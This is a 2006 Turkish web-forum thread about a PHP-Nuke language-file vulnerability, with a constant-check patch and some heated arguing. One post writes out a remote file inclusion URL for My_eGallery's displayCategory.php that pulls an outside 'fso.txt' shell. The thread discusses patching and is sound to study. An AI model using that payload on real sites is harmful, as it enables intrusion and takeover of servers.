hiç bir sorun olmaz, ben çok çok önceden denemiştim, dil dosyalarındaki açık, my_eGallery ile aynı özelliği taşıyor. eğer illaki kapatayım diyorsanız,
mainfile.php yi açın şu satırı ekleyin
define('SEYRANLI', true);
ardından, dil dosyalarına, copyright dosyalarına, theme.php ye, aklınıza neresi geliyosa şunu ekleyin
if (!defined('SEYRANLI')) {
die("Sitemizin dışında bir çalışma tespit edildi, işleminiz reddediliyor");
}
bu söylediklerim mainfile ve diğer dosyalar için hep <?php satırlarından sonra eklenecektir
Gereksiz bir başlık açığı kapattıysan kapattın banane eğer bizede kapatmamız için söylemiyeceksen niye kapattığını söylüyorsun.Hava mı atıyorsun ? Sormazlar mı bunu Seyranlı abim sağolsun gereksiz başlığı gerekli hale çevirmiş.
normal dil dosyalarında sorun olacağını sanmıyorum ama, belki bi ihtimal fso çağırabilecekleri dosyalar olabilir,mesela mye_galleri açığı da böylydi zamanında
modules/My_eGallery/public/displayCategory.php?basepath=http ://www.site.com/fso.txt?
Gereksiz bir başlık açığı kapattıysan kapattın banane eğer bizede kapatmamız için söylemiyeceksen niye kapattığını söylüyorsun.Hava mı atıyorsun ? Sormazlar mı bunu Seyranlı abim sağolsun gereksiz başlığı gerekli hale çevirmiş.
SANA BİŞİ SÖYLEMEYE DEYMEZ !
Ayrıca açtığım şu Konu MY Glery Dil dosyası değil !!!
Php Nuke dedim !
Gereksiz bir başlık açığı kapattıysan kapattın banane eğer bizede kapatmamız için söylemiyeceksen niye kapattığını söylüyorsun.Hava mı atıyorsun ?
Ağzını yiyim senin.
Ne O kardeş ? YARDIM etmedik diyemi oldu bunlar ?
HAKLISIN !
sen önce karşındakileri sev sonra aslanın ağzını seversin !
ama dikkat et severken ISSIRILMA !
Gereksiz bir başlık açığı kapattıysan kapattın banane eğer bizede kapatmamız için söylemiyeceksen niye kapattığını söylüyorsun.Hava mı atıyorsun ?
Ağzını yiyim senin.
Kardeş Şu alttındaki Link var ya
istersen onun açıklarını bi kapat..
Hackercinin girmesini istemem.
bu arada şu Hacked by DeViL eğer siz bişi yapmayacaksanız ben başlıyım yapmaya ?
Tarih: 2006-04-04, 23:46:48 Mesaj konusu:
Doctor-X boş mesaj yazma. Bir açık vardı ve sen çözdüysen (ki biz çoğu açığı biliyoruz) açık hakkında bilgi verip nasıl kapatılacağını yazmalıydın. Boş boş mesaj yazıp canımı sıkma.
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız